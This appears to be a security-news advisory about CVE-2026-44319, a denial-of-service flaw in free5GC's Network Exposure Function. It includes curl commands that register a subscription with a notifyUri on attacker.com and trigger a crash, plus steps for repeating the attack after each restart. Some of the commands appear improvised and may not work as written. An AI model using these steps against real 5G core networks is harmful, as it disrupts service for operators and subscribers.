Listen to this Post
CVE-2026-44319 describes a denial-of-service vulnerability in free5GC, an open-source 5G core network implementation. The flaw resides in the Network Exposure Function (NEF) component, specifically in how it handles failed delivery notifications for Packet Flow Description (PFD) subscriptions. When an operator or external entity creates a PFD subscription, it includes a notifyUri – a callback endpoint where the NEF should send notifications when PFDs change. In versions prior to 4.2.2, the function `PfdChangeNotifier.FlushNotifications()` calls `NnefPFDmanagementNotify(…)` to deliver these notifications. If delivery fails (e.g., the notifyUri is unreachable), the code executes logger.PFDManageLog.Fatal(err). In Go, `Fatal` logs the error and then calls os.Exit(1), which immediately terminates the entire NEF process with exit code 1. An attacker who can create a malicious PFD subscription – supplying an attacker‑controlled notifyUri that points to a non‑existent or refusing endpoint – and then trigger a PFD change (for example, by modifying an associated application or traffic filter) will cause the NEF to asynchronously attempt delivery. On that failed attempt, the NEF crashes, dropping its entire Service Based Interface (SBI) surface. The process remains dead until manually restarted by an operator. This crash is deterministic and does not require any special race condition. The vulnerability is fixed in free5GC version 4.2.2, where the fatal log is replaced with proper error handling that does not abort the process.
DailyCVE Form:
Platform: free5GC
Version: prior 4.2.2
Vulnerability: Fatal log exit
Severity: Critical
date: 05/27/2026
Prediction: Patched version 4.2.2
What Undercode Say:
Check free5GC version
cd free5gc && git describe --tags
Create malicious PFD subscription with unreachable notifyUri
curl -X POST http://nef-ip:8080/nnef-pfdmanagement/v1/subscriptions \
-H "Content-Type: application/json" \
-d '{
"pfdSubscription": {
"appIds": ["malicious-app"],
"notifyUri": "http://attacker.com:9999/does-not-exist"
}
}'
Trigger PFD change (example via SMF/UPF modification)
This forces NEF to call the dead notifyUri, causing os.Exit(1)
curl -X PUT http://smf-ip:8080/nsmf-pdusession/v1/sm-contexts \
-d '{"pfdUpdate": true}'
Observe NEF process exit
ps aux | grep nef
Exploit:
- Register a PFD subscription with a `notifyUri` that points to an unresponsive or invalid HTTP endpoint (e.g., a closed port or a domain that never answers).
- Cause any PFD change event (by adding, updating, or deleting a PFD for the same application ID) that triggers the NEF to send a notification.
- When `NnefPFDmanagementNotify()` fails (e.g., connection refused, timeout), `logger.PFDManageLog.Fatal(err)` is invoked, immediately crashing the NEF process.
- Repeat the attack after each manual restart to maintain denial of service.
Protection:
- Upgrade to free5GC version 4.2.2 or later.
- Apply the patch that replaces `Fatal` with `Error` logging and continues execution without exiting.
- As a workaround, filter inbound PFD subscription requests to disallow untrusted `notifyUri` values (allow only internal, validated endpoints).
Impact:
- Complete crash of the NEF component.
- Loss of all Network Exposure Function services, including PFD management, event exposure, and parameter provisioning.
- Disruption of 5G core network operations that depend on NEF (e.g., northbound APIs, capability exposure).
- Availability impact without privilege escalation; a single request triggers deterministic DoS.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

